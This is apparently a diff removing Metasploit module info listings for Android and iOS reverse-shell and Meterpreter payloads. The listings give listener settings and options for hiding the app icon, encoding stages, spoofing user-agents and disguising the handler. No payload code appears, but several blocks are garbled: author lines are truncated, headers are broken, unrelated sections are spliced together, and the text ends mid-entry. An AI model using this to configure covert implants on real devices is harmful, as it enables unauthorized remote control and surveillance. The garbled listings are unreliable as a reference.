|
||||||
HttpReferer no An optional value to use for the Referer HTTP header
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,66 +0,0 @@
|
|||||||
|
|
||||||
Name: Android Meterpreter, Android Reverse TCP Stager
|
|
||||||
Module: payload/android/meterpreter/reverse_tcp
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 10217
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
mihi
|
|
||||||
egypt <egypt@metasploit.com>
|
|
||||||
OJ Reeves
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run a meterpreter server in Android.
|
|
||||||
|
|
||||||
Connect back stager
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
|
||||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
|
||||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,58 +0,0 @@
|
|||||||
|
|
||||||
Name: Android Meterpreter Shell, Reverse HTTP Inline
|
|
||||||
Module: payload/android/meterpreter_reverse_http
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: No
|
|
||||||
|
|
||||||
Evasion options for payload/android/meterpreter_reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
g Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a Meterpreter shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,60 +0,0 @@
|
|||||||
|
|
||||||
Name: Android Meterpreter Shell, Reverse HTTPS Inline
|
|
||||||
Module: payload/android/meterpreter_reverse_https
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: No
|
|
||||||
|
|
||||||
Evasion options for payload/android/meterpreter_reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a Meterpreter shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,54 +0,0 @@
|
|||||||
|
|
||||||
Name: Android Meterpreter Shell, Reverse TCP Inline
|
|
||||||
Module: payload/android/meterpreter_reverse_tcp
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 74177
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to the attacker and spawn a Meterpreter shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,63 +0,0 @@
|
|||||||
|
|
||||||
Name: Command Shell, Android Reverse HTTP Stager
|
|
||||||
Module: payload/android/shell/reverse_http
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: N
|
|
||||||
Evasion options for payload/android/shell/reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
asploit.com>
|
|
||||||
anwarelmakrahy
|
|
||||||
OJ Reeves
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a piped command shell (sh).
|
|
||||||
|
|
||||||
Tunnel communication over HTTP
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
|
||||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
|
||||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
|
||||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
|
||||||
HttpReferer no An optional value to use for the Referer HTTP header
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,66 +0,0 @@
|
|||||||
|
|
||||||
Name: Command Shell, Android Reverse HTTPS Stager
|
|
||||||
Module: payload/android/shell/reverse_https
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: N
|
|
||||||
Evasion options for payload/android/shell/reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
sploit.com>
|
|
||||||
anwarelmakrahy
|
|
||||||
OJ Reeves
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a piped command shell (sh).
|
|
||||||
|
|
||||||
Tunnel communication over HTTPS
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
|
||||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
|
||||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format
|
|
||||||
HttpCookie no An optional value to use for the Cookie HTTP header
|
|
||||||
HttpHostHeader no An optional value to use for the Host HTTP header
|
|
||||||
HttpReferer no An optional value to use for the Referer HTTP header
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,54 +0,0 @@
|
|||||||
|
|
||||||
Name: Command Shell, Android Reverse TCP Stager
|
|
||||||
Module: payload/android/shell/reverse_tcp
|
|
||||||
Platform: Android
|
|
||||||
Arch: dalvik
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 10209
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
mihi
|
|
||||||
egypt <egypt@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a piped command shell (sh).
|
|
||||||
|
|
||||||
Connect back stager
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AndroidHideAppIcon false no Hide the application icon automatically after launch
|
|
||||||
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
|
|
||||||
AndroidWakelock true no Acquire a wakelock before starting the payload
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,64 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
|
|
||||||
Module: payload/apple_ios/aarch64/meterpreter_reverse_http
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: aarch64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 796904
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
